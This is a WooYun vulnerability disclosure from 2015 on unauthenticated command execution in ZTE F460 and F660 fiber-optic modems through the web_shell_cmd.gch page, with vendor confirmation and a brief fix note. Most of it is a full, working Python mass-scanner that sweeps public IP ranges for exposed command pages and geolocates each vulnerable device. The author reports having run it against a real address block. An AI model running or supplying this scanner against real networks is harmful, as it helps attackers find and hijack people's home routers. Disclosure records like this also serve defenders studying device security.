当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134226

漏洞标题:中兴F460和F660两款光猫未授权访问导致任意命令执行(附扫描脚本)

相关厂商:中兴通讯股份有限公司

漏洞作者: 路人甲

提交时间:2015-08-15 02:31

修复时间:2015-09-29 06:44

公开时间:2015-09-29 06:44

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-15: 细节已通知厂商并且等待厂商处理中
2015-08-15: 厂商已经确认,细节仅向厂商公开
2015-08-25: 细节向核心白帽子及相关领域专家公开
2015-09-04: 细节向普通白帽子公开
2015-09-14: 细节向实习白帽子公开
2015-09-29: 细节向公众公开

简要描述:

未授权访问命令执行

详细说明:

之前看到中兴的多款光猫存在未授权访问导致的任意命令执行,多个实例中均未涉及到F460和F660这两款设备,特意写了个脚本扫描了下,数量不在少数,都是远程80端口直接访问就可以

漏洞证明:

首先看下两款设备的界面,长得几乎一模一样,只是版本号不同

F460.png

F660.png

图上很容易看出来只需要在IP地址后面加web_shell_cmd.gch就可以直接进入命令执行页面,这跟之前其他几款光猫的漏洞一致。
扫描了27.151.1.1-27.160.1.1这个段,其他段没去扫,看下扫描结果吧

scan.jpg


下面给出扫描脚本的代码:

#!/usr/bin/env python
# coding=utf-8
# code by 92ez.com
# last modify time 2015-05-19 08:50
import Queue
from threading import Thread
import time
import re
import sys
import subprocess
import json
import urllib2
#ip to num
def ip2num(ip):
ip = [int(x) for x in ip.split('.')]
return ip[0] << 24 | ip[1] << 16 | ip[2] << 8 | ip[3]
#num to ip
def num2ip(num):
return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24,
(num & 0x00ff0000) >> 16,
(num & 0x0000ff00) >> 8,
num & 0x000000ff)
#get all ips list between start ip and end ip
def ip_range(start, end):
return [num2ip(num) for num in range(ip2num(start), ip2num(end) + 1) if num & 0xff]
#main function
def bThread(iplist):
SETTHREAD = raw_input('Thread: ')
print '[Note] Running...\n'
threadl = []
queue = Queue.Queue()
hosts = iplist
for host in hosts:
queue.put(host)
threadl = [tThread(queue) for x in xrange(0, int(SETTHREAD))]
for t in threadl:
t.start()
for t in threadl:
t.join()
#get host position by Taobao API
def getposition(host):
try:
ipurl = "http://ip.taobao.com/service/getIpInfo.php?ip="+host
jsondata = urllib2.urlopen(ipurl).read()
value = json.loads(jsondata)['data']
info = [value['country'],value['region'],value['city'],value['isp'] ]
return info
except Exception, e:
print "[Note] Get "+ host+" position failed , will retry ...\n"
getposition(host)
#create thread
class tThread(Thread):
def __init__(self, queue):
Thread.__init__(self)
self.queue = queue
def run(self):
global PORT
while not self.queue.empty():
host = self.queue.get()
try:
#print host
checktitle(host,PORT)
except:
continue
def checktitle(host,port):
aimurl = "http://"+host+":"+port+"/web_shell_cmd.gch"
try:
f = urllib2.urlopen(aimurl,timeout = 5)
htmlcontent = f.read()
f.close()
if len(htmlcontent) == 4609:
posinfo = getposition(host)
title = re.findall(r'<title>(.+?)</title>',htmlcontent)
print "Fount "+ title[0].encode('utf8') +" , url : "+ aimurl +" ,extra info :"+posinfo[0].encode('utf8')+" "+posinfo[1].encode('utf8')+" "+posinfo[2].encode('utf8')+" "+posinfo[3].encode('utf8')

except Exception, e:
pass
if __name__ == '__main__':
print '\nScan ZTE Fxx0 fiber-optic modem program.\n'

startIp = raw_input('Start IP: ')
endIp = raw_input('End IP: ')
port = raw_input('Port: ')
global PORT
PORT = port
iplist = ip_range(startIp, endIp)
print '\n[Note] Total '+str(len(iplist))+" IP...\n"
bThread(iplist)

修复方案:

限制授权访问

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-08-15 06:42

厂商回复:

感谢提交,辛苦了

最新状态:

暂无